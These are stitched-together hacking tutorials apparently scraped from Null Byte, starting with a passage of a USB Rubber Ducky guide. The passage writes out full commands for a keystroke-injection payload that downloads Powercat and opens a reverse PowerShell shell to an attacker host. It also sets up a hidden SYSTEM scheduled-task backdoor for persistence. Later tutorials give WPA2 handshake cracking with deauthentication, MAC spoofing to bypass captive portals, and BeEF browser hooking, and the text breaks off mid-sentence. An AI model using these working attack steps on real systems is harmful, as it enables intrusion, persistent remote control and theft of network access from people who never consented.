$a\d.ps1β€” PowerShell is instructed toinvoke a web request(wget) and fetch the powercat.ps1 with the shortened cutt.ly URL. This URL links directly to the Powercat GitHub page but can be changed to the full URL or another shortened URL. The powercat.ps1 is saved (-o) to the temp directory ($a) with the file name "d.ps1". The file name was shorted to a single letter to keep the Ducky payload as short as possible.ipmo $a\d.ps1β€” PowerShell'sImport-Modulefunction is called using the aliasipmo. Again, using the shorter version of the command to keep the Ducky payload short. The powercat.ps1 is imported.powercat -c 192.168.0.208 -p 1234 -e powershellβ€” Finally, Powercat is executed and instructed to connect (-c) to the attacker's server (192.168.0.208) on port (-p) 1234 and execute (-e) PowerShell when the connection is established. This effectively grants the attacker remote access to a root PowerShell terminal.The REM comments can remain in the payload and will not affect the keystroke injections. To save and exit the nano terminal, pressCtrl-x, theny, thenEnter.Step 5: Encode the PayloadUSB Rubber Ducky payloads can't be loaded to themicroSD cardin plain text. Instead, theHak5 Duck Encoderwill be used to convert the plain text payload into a binary format.Don't Miss:Load & Use Keystroke Injection Payloads on the USB Rubber DuckyTo clone the Duck Encoder repository, use the below command.~$ git clone https://github.com/hak5darren/USB-Rubber-Ducky/Change (cd) into the newly created Encoder/ directory.~$ cd USB-Rubber-Ducky/Encoder/And encode the payload.txt using the below command. This command will use the encoder.jar to convert the input (-i) file into the necessary "inject.bin" output (-o) binary. The output file name is not arbitrary and must be named "inject.bin" for the Ducky to execute keystroke injection attacks.~$ java -jar encoder.jar -i ~/payload.txt -o inject.bin Hak5 Duck Encoder 2.6.4 Loading File ..... [ OK ] Loading Keyboard File ..... [ OK ] Loading Language File ..... [ OK ] Loading DuckyScript ..... [ OK ] DuckyScript Complete..... [ OK ]When that's done, there will be a new "inject.bin" file in the Encoder/ directory. This can be verified using the belowls-lcommand.~$ ls -l -rw-r--r--. 1 root root 1466 Jan 11 11:39 README -rw-r--r--. 1 root root 57535 Jan 11 11:39 encoder.jar -rw-r--r--. 1 root root 86 Jan 12 01:57 inject.bin drwxr-xr-x. 2 root root 4096 Jan 11 11:39 resources drwxr-xr-x. 2 root root 4096 Jan 11 11:39 srcStep 6: Connect the Ducky MicroSD to the Android DeviceUsing the card reader adapter, internal microSD card slot, or OTG adapter with card reader, insert the Ducky microSD card into the Android device. The microSD file contents can be viewed using Android's Download app.Image by tokyoneon/Null ByteAfter a few seconds, a new removable device will be accessible via the Download app (example). Navigate back to the Kali OS terminal. The Kali OS won't have access to external storage devices (i.e., the microSD card), so the "inject.bin" will first need to be copied (cp) to the /sdcard/Download/ directory, then copied to the microSD using the Android OS.~$ cp ~/USB-Rubber-Ducky/Encoder/inject.bin /sdcard/Download/And there it is, now available in the Download app.Highlight the "inject.bin" and tap the "Copy to" button. Then, copy it to the microSD card and safely eject the microSD from the Android device.Step 7: Let the Hacking BeginInsert the USB Rubber Ducky into the target Windows 10 machine and a new connection to the Android device will be established.~$ nc -vv -l -p 1234 Ncat: Version 7.70 ( https://nmap.org/ncat ) Ncat: Connection from 192.168.0.33. Ncat: Connection from 192.168.0.33:49672. Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved. PS C:\Windows\system32>Netcat will report a new "Connection from xx.xx.xx.xx" containing the target's IP address. Running a command likelsorpwdwill list files in the current directory or print the current directory name, respectively. The pwnage can begin.Step 8: Establish Persistence (Optional)The first thing to do after establishing a reverse shell is set up persistence in case the current connection is lost. This is an optional step but recommended where long-term exploitation is desired. In Windows 10, there are quite a few ways of establishing persistence. Below is one option.To get started, theschtaskscommand can be used to schedule tasks for Windows 10 to automatically perform. For example, it would be possible to have Windows 10 connect to the attacker's server everyXminutes. TheXbeing an arbitrary amount of time, e.g. 10 minutes or 120 minutes.To get around a target seeing the immutable split second terminal pop-up created by PowerShell,schtaskshas a useful functionality to run commandsonlyif the computer is idle. So, if the screen has gone to sleep or the screensaver is up running, only then will it attempt a connection to the attacker's server. This is ideal for getting the terminal pop-up to execute only when the owner of the PC is away from the device.Theschtaskscommand has a ~175 character limit which can make running long commands challenging. To quickly get around this, first create a "backdoor.ps1" containing the Powercat download, import, execute commands.> echo "IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); powercat -c 192.168.0.208 -p 2 -e powershell" > C:\ProgramData\Microsoft\Windows\backdoor.ps1The Windows\ directory is being used to store the backdoor.ps1 but this location is completely optional. The directory and file name can be altered to better disguise the location of the script and prevent the target from stumbling upon it. Likewise, the port number (-p 2) can be changed to a different port.Then, useschtasksto execute the "backdoor.ps1" when the computer becomes idle.> schtasks /create /f /ru "NT AUTHORITY\SYSTEM" /tn "backdoor" /tr "powershell -w 1 -ep bypass C:\ProgramData\Microsoft\Windows\backdoor.ps1" /sc onidle /i 1 SUCCESS: The scheduled task "backdoor" has successfully been created.Task Scheduler (schtasks) will create a task with the name (/tn) "backdoor." The task to run (/tr) will execute the backdoor.ps1 script. The frequency (/sc) with which the command is run is set to "onidle" which instructs the computer to run the command only when the device is idle. Finally, the amount in of time (in minutes) is specified by the/iargument and set to1minute.In short, one minuteafterthe target steps away from the computer, it will attempt to execute the backdoor.ps1 embedded in the Microsoft\ directory. Keep in mind, when the target returns, the connection will be automatically terminated by Windows 10. The connection will only persist while the target is away from the computer. Simply restart the Netcat server and wait for the computer to become idle again; a new connection will be attempted every time.Now, using another Screen session, create a new Netcat listener and wait for the Windows machine to become idle.~$ nc -vv -l -p 2 Ncat: Version 7.70 ( https://nmap.org/ncat ) Ncat: Connection from 192.168.0.33. Ncat: Connection from 192.168.0.33:24276. Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved. PS C:\Windows\system32>There's a lot of fun to be had with schtasks. For more on the available arguments use theschtasks /?andschtasks /Create /?command as shown below.> schtasks /Create /?More Android & PowerShell Hacks to ComeWith an Android and small USB device, an attacker can wreak havoc on a network of Windows computer. With only 15 seconds of physical access required to execute the payload, an administrative shell can be established, allowing the attacker to embed long term persistence into the device.Android with UserLAnd works great as a hacking device. There are some limitations, however. The CPU doesn't quite have what it takes to run full frameworks like Metasploit, Empire, and Wine. In future articles, we'll have some fun with advanced post-exploitation attacks such as capturing keystrokes and recording audio through the microphone using only Android and PowerShell.Don't Miss:More Null Byte Guides on Using Android for HackingFollow Null Byte onTwitter,Flipboard, andYouTubeSign up forNull Byte's weekly newsletterFollow WonderHowTo onFacebook,Twitter,Pinterest, andFlipboardWant to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseCover photo and screenshots by tokyoneon/Null ByteRelatedHow To:Modify the USB Rubber Ducky with Custom FirmwareHow To:Catch USB Rubber Duckies on Your Computer with USBRipHow To:Load & Use Keystroke Injection Payloads on the USB Rubber DuckyHow To:Automate Hacking on the Raspberry Pi with the USB Rubber DuckyAndroid for Hackers:How to Backdoor Windows 10 & Livestream the Desktop (Without RDP)How To:Steal macOS Files with the USB Rubber DuckyHacking macOS:How to Steal Signal Conversations from a MacBook with a USB Rubber DuckyHow To:Hack MacOS with Digispark Ducky Script PayloadsHacking macOS:How to Use One Python Command to Bypass Antivirus Software in 5 SecondsHow To:Steal Usernames & Passwords Stored in Firefox on Windows 10 Using a USB Rubber DuckyHow To:Use the USB Rubber Ducky to Disable Antivirus Software & Install RansomwareHow To:Run USB Rubber Ducky Scripts on a Super Inexpensive Digispark BoardHow To:Null Byte & Null Space Labs Present: Wi-Fi Hacking, MITM Attacks & the USB Rubber DuckyHow To:USB Tether Your Android Device to Your Macβ€”Without RootingHow To:Mirror & Control Your Android's Screen on Your Windows PCHow To:Hack Android Using Kali (Remotely)Hacking macOS:How to Use One Tclsh Command to Bypass Antivirus ProtectionsHow To:Install Android 9.0 Pie Beta on Your Essential PhoneHow To:Install Android 11 on Your Pixel Without Unlocking the Bootloader or Losing DataNews:Hak5 Just Released the Packet SquirrelHow To:Install Android Q Beta on Your Essential PhoneBuyer's Guide:Top 20 Hacker Holiday Gifts for Christmas 2017How To:1-Click Root Many Android Devices with Kingo Android RootHacking Gear:10 Essential Gadgets Every Hacker Should TryHow To:Finally, There's a Better Alternative to Android File Transfer for MacsHow To:The Fastest Way to Transfer Photos & Videos from Your DSLR to Your AndroidHow To:Customize Your Navigation Bar on Android Nougat β€” No Root NeededHow To:Install the Android M Preview on Your Nexus Device (Using Windows)How To:Use Google's Android Flash Tool to Manually Update Your Phone or Recover from a Soft BrickHow To:Enable the Built-in Screen Recorder on Android 10Android Basics:How to Install ADB & Fastboot on Mac, Linux & WindowsHow To:Unlock the Bootloader on the Essential PH-1How To:Use Your Android Phone as a Wireless Flash Drive for Windows or MacHow To:Root the Nexus 6P or Nexus 5X on Windows, Mac, or Linuxβ€”The Foolproof GuideHow To:Fully Control Your Android Device from Any ComputerNews:Use your Android with your Car StereoHow To:Conceal a USB Flash Drive in Everyday ItemsSUBMIT:Your Best Instagram or PicPlz Photo by September 19th. WIN: 10 "Insta-Stickers" [Closed]News:Instagram Is Finally Coming to AndroidHow To:Embed a Backdoor in an Exe File
How to Hack Wi-Fi: Cracking WPA2-PSK Passwords Using Aircrack-Ng Β« Null Byte :: WonderHowTo
Welcome back, my greenhorn hackers.When Wi-Fi was first developed in the late 1990s, Wired Equivalent Privacy was created to give wireless communications confidentiality. WEP, as it became known, proved terribly flawed and easily cracked. You can read more about that in mybeginner's guide to hacking Wi-Fi.As a replacement, most wireless access points now use Wi-Fi Protected Access II with a pre-shared key for wireless security, known as WPA2-PSK. WPA2 uses a stronger encryption algorithm, AES, that's very difficult to crackβ€”but not impossible. Mybeginner's Wi-Fi hacking guidealso gives more information on this.The weakness in the WPA2-PSK system is that the encrypted password is shared in what is known as the 4-way handshake. When a client authenticates to the access point (AP), the client and the AP go through a 4-step process to authenticate the user to the AP. If we can grab the password at that time, we can then attempt to crack it.Image viaShutterstockIn this tutorial from ourWi-Fi Hacking series, we'll look at usingaircrack-ngand adictionary attackon the encrypted password after grabbing it in the 4-way handshake. If you're looking for a faster way, I suggest you also check out my article onhacking WPA2-PSK passwords using coWPAtty.Step 1: Put Wi-Fi Adapter in Monitor Mode with Airmon-NgLet's start by putting our wireless adapter in monitor mode.Need a wireless network adapter?Buy the Best Wireless Network Adapter for Wi-Fi Hacking in 2017For this to work, we'll need to use a compatible wireless network adapter. Check out our 2017 list of Kali Linux and Backtrack compatible wireless network adapters in the link above, or you can grabour most popular adapter for beginners here.A roundup of Kali Linux compatible wireless network adapters.Image by SADMIN/Null ByteThis is similar to putting a wired adapter into promiscuous mode. It allows us to see all of the wireless traffic that passes by us in the air. Let's open a terminal and type:airmon-ng start wlan0Note that airmon-ng has renamed yourwlan0adapter tomon0.Step 2: Capture Traffic with Airodump-NgNow that our wireless adapter is in monitor mode, we have the capability to see all the wireless traffic that passes by in the air. We can grab that traffic by simply using theairodump-ngcommand.This command grabs all the traffic that your wireless adapter can see and displays critical information about it, including the BSSID (the MAC address of the AP), power, number of beacon frames, number of data frames, channel, speed, encryption (if any), and finally, the ESSID (what most of us refer to as the SSID). Let's do this by typing:airodump-ng mon0Note all of the visible APs are listed in the upper part of the screen and the clients are listed in the lower part of the screen.Step 3: Focus Airodump-Ng on One AP on One ChannelOur next step is to focus our efforts on one AP, on one channel, and capture critical data from it. We need the BSSID and channel to do this. Let's open another terminal and type:airodump-ng --bssid 08:86:30:74:22:76 -c 6 --write WPAcrack mon008:86:30:74:22:76is the BSSID of the AP-c 6is the channel the AP is operating onWPAcrackis the file you want to write tomon0is the monitoring wireless adapter*As you can see in the screenshot above, we're now focusing on capturing data from one AP with a ESSID of Belkin276 on channel 6. The Belkin276 is probably a default SSID, which are prime targets for wireless hacking as the users that leave the default ESSID usually don't spend much effort securing their AP.Step 4: Aireplay-Ng DeauthIn order to capture the encrypted password, we need to have the client authenticate against the AP. If they're already authenticated, we can de-authenticate them (kick them off) and their system will automatically re-authenticate, whereby we can grab their encrypted password in the process. Let's open another terminal and type:aireplay-ng --deauth 100 -a 08:86:30:74:22:76 mon0100is the number of de-authenticate frames you want to send08:86:30:74:22:76is the BSSID of the APmon0is the monitoring wireless adapterStep 5: Capture the HandshakeIn the previous step, we bounced the user off their own AP, and now when they re-authenticate, airodump-ng will attempt to grab their password in the new 4-way handshake. Let's go back to our airodump-ng terminal and check to see whether or not we've been successful.Notice in the top line to the far right, airodump-ng says "WPA handshake." This is the way it tells us we were successful in grabbing the encrypted password! That is the first step to success!Step 6: Let's Aircrack-Ng That Password!Now that we have the encrypted password in our fileWPAcrack, we can run that file against aircrack-ng using a password file of our choice. Remember that this type of attack is only as good as your password file. I'll be using the default password list included with aircrack-ng onBackTracknameddarkcOde.We'll now attempt to crack the password by opening another terminal and typing:aircrack-ng WPAcrack-01.cap -w /pentest/passwords/wordlists/darkc0deWPAcrack-01.capis the name of the file we wrote to in the airodump-ng command/pentest/passwords/wordlist/darkc0deis the absolute path to your password fileHow Long Will It Take?This process can be relatively slow and tedious. Depending upon the length of your password list, you could be waiting a few minutes to a few days. On my dual core 2.8 gig Intel processor, it's capable of testing a little over 500 passwords per second. That works out to about 1.8 million passwords per hour. Your results will vary.When the password is found, it'll appear on your screen. Remember, the password file is critical. Try the default password file first and if it's not successful, advance to a larger, more complete password file such as one of these.CrackStation's Password Cracking DictionarySkullSecurity's Password DictionariesStay Tuned for More Wireless Hacking GuidesKeep coming back, as I promise more advanced methods of hacking wireless in future tutorials. If you haven't seen the other Wi-Fi hacking guides yet, check them outhere. Particularly the one onhacking WEP using aircrack-ngandhacking WPA2-PSK passwords using coWPAtty.If you're looking for a cheap, handy platform to get started working with aircrack, check out our Kali Linux Raspberry Pi build usingthe $35 Raspberry Pi.A beginner Wi-Fi hacking kit.Image by SADMIN/Null ByteGet Started Hacking Today:Set Up a Headless Raspberry Pi Hacking Platform Running Kali LinuxAnd as always, if you have questions on any of this, please ask away in the comments below. If it's something unrelated, try asking in theNull Byte forum.Want to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseCover image viaShutterstockRelatedHow to Hack Wi-Fi:Selecting a Good Wi-Fi Hacking StrategyHow to Hack Wi-Fi:Getting Started with the Aircrack-Ng Suite of Wi-Fi Hacking ToolsHow to Hack Wi-Fi:Cracking WPA2-PSK Passwords with CowpattyHow to Hack Wi-Fi:Choosing a Wireless Adapter for HackingHow to Hack Wi-Fi:Getting Started with Terms & TechnologiesHow to Hack Wi-Fi:Cracking WEP Passwords with Aircrack-NgHow to Hack Wi-Fi:Breaking a WPS PIN to Get the Password with BullyHow To:Crack WPA & WPA2 Wi-Fi Passwords with PyritHow to Hack Wi-Fi:Hunting Down & Cracking WEP NetworksHow To:Share Wi-Fi Adapters Across a Network with Airserv-NgHow to Hack Wi-Fi:Cracking WPA2 Passwords Using the New PMKID Hashcat AttackHow To:Crack Wi-Fi Passwordsβ€”For Beginners!How To:Null Byte & Null Space Labs Present: Wi-Fi Hacking, MITM Attacks & the USB Rubber DuckyHack Like a Pro:How to Get Even with Your Annoying Neighbor by Bumping Them Off Their WiFi Network β€”UndetectedHack Like a Pro:How to Crack Passwords, Part 1 (Principles & Technologies)How to Hack Wi-Fi:Capturing WPA Passwords by Targeting Users with a Fluxion AttackHow To:Brute-Force WPA/WPA2 via GPUHow To:Hack Your Neighbor with a Post-It Note, Part 1 (Performing Recon)Video:How to Crack Weak Wi-Fi Passwords in Seconds with Airgeddon on Parrot OSHow To:Hack Wi-Fi Networks with BettercapHow To:The Beginner's Guide to Defending Against Wi-Fi HackingHow to Hack Wi-Fi:DoSing a Wireless AP ContinuouslyHow To:Spy on Traffic from a Smartphone with WiresharkHow To:Identify Antivirus Software Installed on a Target's Windows 10 PCHow To:Automate Wi-Fi Hacking with Wifite2How To:Hack WPA WiFi Passwords by Cracking the WPS PINHow To:Hack WiFi Passwords for Free Wireless Internet on Your PS3Hack Like a Pro:How to Hack into Your Suspicious, Creepy Neighbor's Computer & Spy on HimHow To:Hack 5 GHz Wi-Fi Networks with an Alfa Wi-Fi AdapterHow To:How Hackers Steal Your Internet & How to Defend Against ItHow To:Bypass a Local Network Proxy for Free InternetHow To:Fix the Channel -1 Glitch in Airodump on the Latest Kernel
Unlock Facial Detection & Recognition on the Inexpensive ESP32-Based Wi-Fi Spy Camera Β« Null Byte :: WonderHowTo
If you've recently built aWi-Fi spy cameraout of anESP32-CAM, you can use it for a variety of things. A baby monitor at night, a security camera for catching package thieves, a hidden video streamer to catch someone going somewhere they shouldn't be β€” you could use it for pretty much anything. Best of all, this inexpensive camera module can perform facial detection and facial recognition!The low-cost ESP32-CAM is an interesting camera module because it has enough RAM to perform those facial detection and facial recognition processes. The detection can spot faces whenever they pop in the frame, while the recognition can spot intruders or identify faces that you've enrolled into its code. It's not the most accurate camera that can do these tasks, but it does it well enough.It's pretty good as not mixing up faces (we couldn't trip it up at all), but it can show an enrolled ID as an intruder because of the limited number of facial scans it records for the database. You can overcome this by enrolling the same face multiple times at different angles and remembering to assign each ID to the right person.Previous Guide:How to Set Up a Wi-Fi Spy Camera with an ESP32-CAMParts NeededThis is the basic stuff you need to continue with this project. If you've already built and set up your Wi-Fi spy camera using our previous guide, you should have everything you need to dive right into using the facial recognition features.ESP32-CAM Camera Module with FTDI USB to TTL Serial Converter($12.89)D1 Mini Battery Shield with Charging Module($8.99)3.7 V 500 mAh LiPo Battery($9.20)Solderless Breadboard($8.99)Jumper Wires($5.99)Mini-USB Cable($6.81)Arduino IDE Software(free)Note that the battery required can be a different size if needed.Step 1: Set Up Your Wi-Fi Spy CameraWe'vealready shownhow to set up the ESP32-CAM in Arduino IDE, open the default CameraWebServer sketch, tweak the sketch's code to select the right camera module and add the Wi-Fi credentials, wire up the ESP32-CAM to the FTDI programmer, upload the sketch to the ESP32-CAM, power up the spy camera, find its IP address, and connect to its web server interface.There's no need to go over all of that again when we have afull guideon it, so check that out if you haven't got your Wi-Fi spy camera online.Tutorial:How to Set Up a Wi-Fi Spy Camera with an ESP32-CAMStep 2: Try Facial DetectionIn a web browser, connect to your Wi-Fi spy camera's IP address to open up its web interface. Then, hit the "Start Stream" button at the bottom to start the live camera feed.Next, increase the resolution if needed, but do not exceed 400 by 296 pixels because facial recognition will not work in any resolutions higher than that.Now, go back to the bottom and toggle on the "Face Detection" switch. This mode will detect whenever a human face is in front of the camera lens, and you can see that it's working when a box appears around the face. (It's based on theESP-WHOproject, in case you were wondering.)If you still have your ESP32-CAM connected to your computer with Arduino IDE running, you can open up the serial monitor in the IDE to view the serial output. Here, you'll be able to see that the face detections are logged.With this information, you could make a simple Bash script to grep and monitor a continuous stream, then build a program that detects faces and sends you notifications on your phone whenever, say, someone is outside your door. You could basically create a really bare-bonesRing Video Doorbell. This is beyond the scope of this article, but it could be a future Null Byte guide!Step 3: Try Facial RecognitionNow, go back to the bottom and toggle on the "Face Recognition" switch. This mode expands the detection capabilities to identify faces in the feed, and it's also part of the ESP-WHO project.Whenever a face is unknown, a red box will be around it with an "Intruder Alert!" warning.Back in the serial monitor, you'll be able to see these intruder alerts as well, which basically means that the face is not in your database.To have the facial recognition tool identify people's faces and name them, those faces need to be enrolled. Back at the bottom of the interface, whenever an intruder is in the feed that you want to give a name to, click "Enroll Face." It will then take different snapshots of the face until it has enough to recognize it, then it will say "Hello Subject 0" in green.Back in the serial monitor, you'll be able to see that it identifies Subject 0.Any subsequent faces you enroll will be labeled as Subject 1, then 2, and so on.In the serial monitor, you'll be able to see that it identifies the subject by each's number.How Accurate Is the Facial Recognition?While it's a fairly basic program, it does a decent job at recognizing faces. In tests, we couldn't get any random images of people's faces to match a subject's real face and be identified as such.We also couldn't get enrolled faces to be identified as other enrolled faces. However, because it only takes a few snapshots when enrolling a face, it may detect a subject as an intruder if the face angle is different than when recorded. Plus, the software is not sophisticated enough to detect faces when only partially seen or tilted too much, but it does work nicely for profile shots and slight angles.Keep This in Mind for Other ProjectsAs you just saw, there are limitations when using a small microcontroller with a camera module to perform facial detection and recognition. But it's a great project if you want to take the next step and start coding your own applications that use facial detection and recognition as factors. The serial monitor can be constantly monitored to look for detected faces, intruders, and registered faces, and all it takes is a simple script to get it working.Don't Miss:Intercept Images from a Security Camera Using WiresharkWant to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseCover image, screenshots, and GIFs by Retia/Null ByteRelatedHow To:Null Byte's Hacker Guide to Buying an ESP32 Camera Module That's Right for Your ProjectNews:Google Challenges Apple's iPhone X Series with Face Unlock & Air Gestures on Pixel 4How To:Enable Offline Chat Communications Over Wi-Fi with an ESP32How To:Set Up a Wi-Fi Spy Camera with an ESP32-CAMHow To:5 Lesser Known Jelly Bean Features on Your Samsung Galaxy S IIIHow To:Program an ESP8266 or ESP32 Microcontroller Over Wi-Fi with MicroPythonHow To:Stop Facial Recognition Software from Finding Out Who You Are on CameraNews:Galaxy S9 Tipped to Have 'Intelligent Scan' Facial Unlocking β€” Iris & Face Recognition CombinedHow To:Set Up Face Unlock on the Google Pixel 4News:All There Is to Know About the Moto G7 PlayHow To:Galaxy S10 Fingerprint Sensor Slow? Enable This Setting InsteadHow To:Use Intelligent Scan to Unlock Your Galaxy S9 FasterNews:Blippar Brings Facial Recognition AR Profiles to Mobile AppHow To:Turn Off All Tracking Sensors on Android 10How To:3 Ways to Unlock Your Samsung Galaxy S8 Faster β€” Without Using the Fingerprint ScannerHow To:Find & Share Local Wi-Fi Passwords for Free Internet Everywhere You GoHow to Hack Wi-Fi:Disabling Security Cameras on Any Wireless Network with Aireplay-NgNews:Forget Face Masks, Facebook Is Working on Full-Body AR Camera EffectsHow To:5 Reasons You Should Use Be Using Norton Mobile Security on Your Android DeviceNews:8th Wall Brings Image Targets to Its Web-Based Augmented Reality PlatformNews:This Augmented Reality Black Friday Ad from Footwear Retailer DSW Is Like a Scene from 'Black Mirror'News:After 5 Years, Touch ID Is About to Get Read Its Last RitesNews:Your Face Could Unlock the New iPhone 8How To:Easily Store Your iPhone's Wi-Fi Passwords & Share Them with Anybody β€” Even Android UsersNews:Xiaomi Might Make Its First Stop on US Shores with the Mi 8 Anniversary EditionHow To:Create a Wireless Spy Camera Using a Raspberry PiNews:Microsoft Releases Snapchat-Like Photo Editor on iOSHow To:This Widget Lets You Open Wi-Fi Settings Faster, Share Passwords & More on Your iPhoneHow To:Change Your Android Screen's Orientation Using Your Face Instead of the Device's AngleHow To:Switch or Connect to Wi-Fi Networks & Bluetooth Devices Right from the Control Center in iOS 13How To:Scan, Fake & Attack Wi-Fi Networks with the ESP8266-Based WiFi DeautherNews:Everything You Need to Know About the New Moto G7 PowerHow To:Intercept Images from a Security Camera Using WiresharkNews:Mobile AR App Octi Evolves into Social Network via Facial Recognition TechHow To:Use Facial Recognition to Conduct OSINT Analysis on Individuals & CompaniesNews:Image Recognition Expected to Generate $40 Billion by 2021How To:Share Your Wi-Fi Password with a QR Code in Android 10News:Snapchat Virtually Restores London's Big Ben with Holiday-Themed, Location-Based AR LensNews:iOS 11.2 Beta 3 Released, Includes Pop-Up Alerts for Wi-Fi & Bluetooth Controls, New Control Center BarNews:PSP2 (Next Generation Portable) or NGP
How to Bypass a Local Network Proxy for Free Internet Β« Null Byte :: WonderHowTo
Have you ever been away from home or on holiday and noticed an open network connection? FREE INTERNET! But then you find out that every search or page redirects you to an "enter password" or "signup here" page. Well, there are ways around this.In this article, I'll show you how to bypass a local network proxy.On a simple networking system, users would connect, enter passwords, get a local IP, and be able to connect to the internet through the proxy. But how does the machine know which computer is what? This is the keyβ€”the MAC address. The network logs the MAC address of the authenticated device and allows connectivity until either timeout or until they sign out.The ExploitTo complete this exploitation, you'll need a Linux distro with networking and injection drivers,Aircrack-ng, and a program calledMacchanger.1) Open up Terminal and throw your card into monitor mode:airmon-ng start wlan0(or whatever your card's name is)2) Now, start airodump-ng and observe the devices connected to your victim network:airodump-ng mon03) Note your victim's network MAC address (or BSSID). Then, on the device list in airodump-ng, check out what the MAC addresses of the connected devices (to your network) are. Look for one with a lot of packet "acceptance" and "power" (meaning it's close by), and select and copy the MAC address of the device (NOT the access point BSSID). If you're confused, take a look at the photo below:4) Disable all interfaces with:ifconfig wlan0down andairmon-ng stop mon05) Finally, fake the MAC address of the device you chose:macchanger -m XX:XX:XX:XX:XX (the victim's MAC) wlan06) Start upWicdor similar tool and connect to your victim's network. If all goes well, you should have internet access!WarningsHacking is illegal! This is for educational purposes only.I am not responsible for any damage, harm or legal trouble you get yourself into.Want to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseRelatedHow To:Use Google Translate as a ProxyHow To:Bypass School Internet Filters to Unblock WebsitesSPLOIT:How to Make a Proxy Server in PythonHow To:Bypass a blocked site with a proxyHow To:Hide Your IP Address with a Proxy ServerHow To:Stream Netflix, Hulu, and Pandora from Anywhere in the World with Media HintHow To:Use a proxy to bypass parental control filtersHow To:Access blocked websites and bypass proxy serversHow To:Access blocked websites & bypass web filtersHow To:Change your IP address in five different waysHow To:A Hitchhiker's Guide to the Internet: Today and Now, How It All ConnectsHow To:Bypass WebSense at school using http tunnelNews:Netflix to Block VPN & Proxy Users from Streaming Content in Other TerritoriesHow to Hack Wi-Fi:Evading an Authentication Proxy Using ICMPTXHow To:Bypass Filters, Firewalls, & Open Hotspot Restrictions on Your Galaxy Note 3News:Reality of VPNs, Proxies, and TorHow To:Chain Proxies to Mask Your IP Address and Remain Anonymous on the WebNews:Anonymity Networks. Don't use one, use all of them!How To:Use Tortunnel to Quickly Encrypt Internet TrafficHow To:Bypass DansGuardian in Chrome, Firefox & Internet ExplorerHow To:Sneak Past Web Filters and Proxy Blockers with Google TranslateNews:Play BF3 Today! (1 day early)How To:Quickly Encrypt Your Web Browsing Traffic When Connected to Public WiFiHow To:Log In and Access Blocked Websites (e.g. Facebook, Twitter & YouTube) from Work, School or Your Home ComputerHow To:How Hackers Use Your IP Address to Hack Your Computer & How to Stop ItNews:Anonymity, Darknets and Staying Out of Federal Custody, Part One: Deep WebAnonymous Browsing in a Click:Add a Tor Toggle Button to ChromeTor vs. I2P:The Great Onion DebateNews:Anonymity, Darknets and Staying Out of Federal Custody, Part Two: Onions and DaggersNews:Nextdoor Brings Private Social Networks to a Neighborhood Near YouNews:Anonymity, Darknets and Staying Out of Federal Custody, Part Four: The Invisible InternetThe Ultimate Guide:Diagnosing & Fixing Connection Issues, Part IHow To:Completely Mask & Anonymize Your BitTorrent Traffic Using Anomos
How to Use BeEF and JavaScript for Reconnaissance Β« Null Byte :: WonderHowTo
Welcome back everyone. As many of you know, reconnaissance is extremely important in any successful hack. Without proper reconnaissance, we won't know what we're about to get into, literally.Among the vast ocean of information we need about our target, operating system isdefinitelyrequired. If we don't know the OS, we're half blind! The process of identifying our targets operating system is known as OS fingerprinting.Image viasecurityintelligence.comThere are many tools capable of OS fingerprinting, such asp0fandnmap, but today we'll be using a tool that isn't built specifically for recon,BeEF.BeEF stands forBrowser (Othere)ExploitationFramework. It allows us to "hook" into the victim's browser and cause all sorts of mayhem. You may remember that we'vepreviously used BeEFto take photos through a webcam. This is just a taste of what BeEF is capable of.The second part of today's recon isJavaScript, a powerful web development language. We'll be executing some JavaScript on our victim today. This will yield their OS. We'll simply be using BeEF as a means of execution. We'll be attempting to fingerprint a victim running Windows 10, so, let's get cooking!Step 1: Launch and Log into BeEFIf we're going to use BeEF, we might want to start it first! For those of you using Kali 2.0, BeEF is conveniently located on the dock to the side of the desktop:For those of you still using Kali 1.X, you can start BeEF with the following:Start BeEF with this command:service beef-xss startNavigate to the login page at 127.0.0.1:3000/ui/authenticationNow we all should be at the authentication page for BeEF, which should look something like this:Now, the default user name and password are bothbeef, let's log in with these credentials and start our recon!Step 2: Hook the VictimIn order for us to be able to execute our JavaScript, we need to "hook" the victim. Once we hook the victim, we'll be able to control their browser. BeEF has it's own demo hook page for testing, we'll be using this today. Let's start by looking at what browsers we currently have hooked:Alright, we can see here that we only have one victim, this was the victim from our last BeEF tutorial. Now let's go ahead and navigate our victim to the BeEF demo page:Now that we've loaded the demo page, we should see our victim appear under "Hooked Browsers" in our BeEF window:Now that we've successfully hooked the victim, we can control their browser. This includes the ability to execute JavaScript.Step 3: Execute the JavaScriptNow that we have our victim hooked, we can execute JavaScript against their browser. BeEF has many modules to control the victim, we'll be using the "Raw JavaScript" module, let's go ahead and navigate to it in our BeEF window:We've found our desired module, now let's take a look at the description:It simply tells us that whatever we script into the text field will be executed against the victims browser, it also comes with some sample code.Time to get a little technical; Most browsers support a JavaScript object called the "navigator", this 